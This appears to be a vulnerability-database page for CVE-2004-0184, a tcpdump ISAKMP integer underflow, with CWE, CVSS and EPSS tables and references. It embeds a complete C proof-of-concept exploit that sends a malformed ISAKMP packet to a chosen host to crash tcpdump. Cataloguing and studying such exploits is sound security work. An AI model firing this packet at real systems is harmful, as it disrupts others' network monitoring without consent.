CVE-2004-0184

CVE Descriptions

Integer underflow in the isakmp_id_print for TCPDUMP 3.8.1 and earlier allows remote attackers to cause a denial of service (crash) via an ISAKMP packet with an Identification payload with a length that becomes less than 8 during byte order conversion, which causes an out-of-bounds read, as demonstrated by the Striker ISAKMP Protocol Test Suite.

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-125	Out-of-bounds Read The product reads data past the end, or before the beginning, of the intended buffer.
CWE-191	Integer Underflow (Wrap or Wraparound) The product subtracts one value from another, such that the result is less than the minimum allowable integer value, which produces a value that is not equal to the correct result.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	5		AV:N/AC:L/Au:N/C:N/I:N/A:P	nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	12.57%	–	–
2022-04-03	–	–	12.57%	–	–
2023-02-26	–	–	12.57%	–	–
2023-03-12	–	–	–	95.19%	–
2023-03-19	–	–	–	94.83%	–
2023-10-15	–	–	–	94.71%	–
2024-02-18	–	–	–	68.37%	–
2024-06-02	–	–	–	68.37%	–
2024-09-15	–	–	–	65.01%	–
2024-12-22	–	–	–	80.96%	–
2025-01-19	–	–	–	80.96%	–
2025-03-18	–	–	–	–	60.41%
2025-03-30	–	–	–	–	65.92%
2025-03-30	–	–	–	–	65.92,%

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Date	Percentile
2022-02-06	9%
2022-04-03	95%
2023-02-26	96%
2023-03-12	99%
2023-03-19	99%
2023-10-15	99%
2024-02-18	98%
2024-06-02	98%
2024-09-15	98%
2024-12-22	99%
2025-01-19	99%
2025-03-18	98%
2025-03-30	98%
2025-03-30	98%

Exploit information

Exploit Database EDB-ID : 171

Publication date : 2004-04-04 22h00 +00:00
Author : Rapid7
EDB Verified : Yes

/* * tcpdump packet sniffer * Integer underflow in ISAKMP Identification payload * denial of service vulnerability * proof of concept code * version 1.0 (Apr 02 2004) * CVE-ID: CAN-2004-0184 * * by Remi Denis-Courmont < exploit at simphalampin dot com > * www simphalempin com dev * Remi Denis-Courmont is not responsible for the misuse of the * source code provided hereafter. * * This vulnerability was found by: * Rapid7, LLC Security Advisory - www rapid7 com * whose original advisory may be fetched from: * www rapid7 com advisories R7-0017 html * * Vulnerable: * - tcpdump 3.8.1 * * Not vulnerable: * - tcpdump 3.8.3 * * NOTES: * The vulnerability cannot be exploited to cause a denial of service * with the Debian's tcpdump packages as it was partly fixed as part of * the fix for earlier known CAN-2003-0108 vulnerability, though the bug * is still present. That may be the case for other vendors which were * not investigated. * * tcpdump must be run with a verbosity level of at least 3: * # tcpdump -vvv * Otherwise, no denial of service will occur. */ #include <string.h> #include <stdio.h> #include <sys/types.h> #include <unistd.h> #include <sys/socket.h> #include <netdb.h> static const char packet[] = /* ISAKMP header */ "\x00\x00\x00\x00\x00\x00\x00\x00" /* Initiator cookie */ "\x00\x00\x00\x00\x00\x00\x00\x00" /* Responder cookie */ "\x05" /* Next payload: Identification */ "\x10" /* Version: 1.0 */ "\x01" /* Exchange type */ "\x00" /* Flags */ "\x00\x00\x00\x00" /* Message ID */ "\x00\x00\x00\x24" /* Length */ /* ISAKMP Identification payload */ "\x00" /* Next payload: none */ "\x00" /* Reserved */ "\x00\x05" /* Payload length (incorrect) */ "\x20" /* ID type (unknown) */ "\x00\x00\x00" /* DOI */ ; static int send_evil_packet (const struct addrinfo *r) { int fd; size_t len; fd = socket (r->ai_family, r->ai_socktype, r->ai_protocol); if (fd == -1) { perror ("Socket error"); return 1; } len = sizeof (packet) - 1; if (sendto (fd, packet, len, 0, r->ai_addr, r->ai_addrlen) != len) { perror ("Packet sending error"); close (fd); return 1; } puts ("Packet sent!"); close (fd); return 0; } static int proof (const char *hostname) { struct addrinfo *res; int check; { struct addrinfo help; memset (&help, 0, sizeof (help)); help.ai_socktype = SOCK_DGRAM; check = getaddrinfo (hostname, "isakmp", &help, &res); } if (check == 0) { struct addrinfo *ptr; for (ptr = res; ptr != NULL; ptr = ptr->ai_next) check |= send_evil_packet (ptr); freeaddrinfo (res); return check; } fprintf (stderr, "%s: %s\n", hostname, gai_strerror (check)); return -1; } static void usage (const char *path) { fprintf (stderr, "Usage: %s <hostname/IP>\n", path); } int main (int argc, char *argv[]) { puts ("tcpdump Integer underflow in ISAKMP Identification payload\n" "proof of concept code\n" "Copyright (C) Remi Denis-Courmont 2004 " "<\x65\x78\x70\x6c\x6f\x69\x74\x40\x73\x69\x6d\x70" "\x68\x61\x6c\x65\x6d\x70\x69\x6e\x2e\x63\x6f\x6d>\n"); if (argc != 2) { usage (argv[0]); return 2; } return proof (argv[1]) ? 1 : 0; } // milw0rm.com [2004-04-05]

Products Mentioned

Configuraton 0

Tcpdump>>Tcpdump >> Version To (including) 3.8.1

Tcpdump>>Tcpdump >> Version 3.5.1 (Open CPE detail)
Tcpdump>>Tcpdump >> Version 3.5.2 (Open CPE detail)
Tcpdump>>Tcpdump >> Version 3.6.1 (Open CPE detail)
Tcpdump>>Tcpdump >> Version 3.6.2 (Open CPE detail)
Tcpdump>>Tcpdump >> Version 3.6.3 (Open CPE detail)
Tcpdump>>Tcpdump >> Version 3.7.1 (Open CPE detail)
Tcpdump>>Tcpdump >> Version 3.7.2 (Open CPE detail)
Tcpdump>>Tcpdump >> Version 3.8.1 (Open CPE detail)

References

http://www.kb.cert.org/vuls/id/492558
Tags : third-party-advisory, x_refsource_CERT-VN

http://www.redhat.com/support/errata/RHSA-2004-219.html
Tags : vendor-advisory, x_refsource_REDHAT

http://securitytracker.com/id?1009593
Tags : vdb-entry, x_refsource_SECTRACK

http://www.debian.org/security/2004/dsa-478
Tags : vendor-advisory, x_refsource_DEBIAN

http://secunia.com/advisories/11258
Tags : third-party-advisory, x_refsource_SECUNIA

http://www.trustix.org/errata/2004/0015
Tags : vendor-advisory, x_refsource_TRUSTIX

https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9581
Tags : vdb-entry, signature, x_refsource_OVAL

http://www.rapid7.com/advisories/R7-0017.html
Tags : x_refsource_MISC

https://bugzilla.fedora.us/show_bug.cgi?id=1468
Tags : vendor-advisory, x_refsource_FEDORA

http://www.securityfocus.com/bid/10004
Tags : vdb-entry, x_refsource_BID

http://www.tcpdump.org/tcpdump-changes.txt
Tags : x_refsource_CONFIRM

https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A976
Tags : vdb-entry, signature, x_refsource_OVAL

http://marc.info/?l=bugtraq&m=108067265931525&w=2
Tags : mailing-list, x_refsource_BUGTRAQ

https://exchange.xforce.ibmcloud.com/vulnerabilities/15679
Tags : vdb-entry, x_refsource_XF

CVE-2004-0184 : Detail